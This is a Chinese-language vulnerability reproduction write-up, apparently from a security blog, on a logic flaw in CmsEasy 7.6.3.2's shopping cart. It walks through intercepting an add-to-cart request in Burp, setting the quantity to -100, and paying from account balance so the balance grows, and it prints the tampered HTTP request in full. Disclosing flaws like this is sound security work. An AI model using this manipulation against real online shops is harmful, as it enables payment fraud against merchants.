004-CmsEasy 7.6.3.2_20200422 逻辑漏洞

# CmsEasy 7.6.3.2_20200422 逻辑漏洞

### 一、漏洞简介

### 二、漏洞影响

CmsEasy 7.6.3.2

### 三、复现过程

1.登录任意账号

2.点击任意产品

![](/static/lingzu/images/15897266217910.png)

2.点击任意产品

![](/static/lingzu/images/15897266288524.png)

3.点开任意一个产品,前提是有余量

![](/static/lingzu/images/15897266373411.png)

4.输入任意正常数量,burp开启抓包,点击添加到购物车

![](/static/lingzu/images/15897266443393.png)

5.将抓到的包中的最后一个数字改为负数

![](/static/lingzu/images/15897266510134.png)

![](/static/lingzu/images/15897266550107.png)

然后放包

“`bash
GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1
Host: www.baidu.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://localhost/index.php?case=archive&act=show&aid=527
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoN
Connection: close
“`

6.此时可以看到购物车中为负数

![](/static/lingzu/images/15897266764936.png)

7.查看个人中心中的余额,为5600

![](/static/lingzu/images/15897266843734.png)

8.点击购物车

![](/static/lingzu/images/15897266914212.png)

9.点击下图内容

![](/static/lingzu/images/15897266982500.png)

10.填写完成之后,点击在线支付

![](/static/lingzu/images/15897267061230.png)

11.选择余额支付,点击购买

![](/static/lingzu/images/15897267130666.png)

12.购买成功

![](/static/lingzu/images/15897267195006.png)

13.回到个人中心,可以看到余额的变化

![](/static/lingzu/images/15897267281648.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容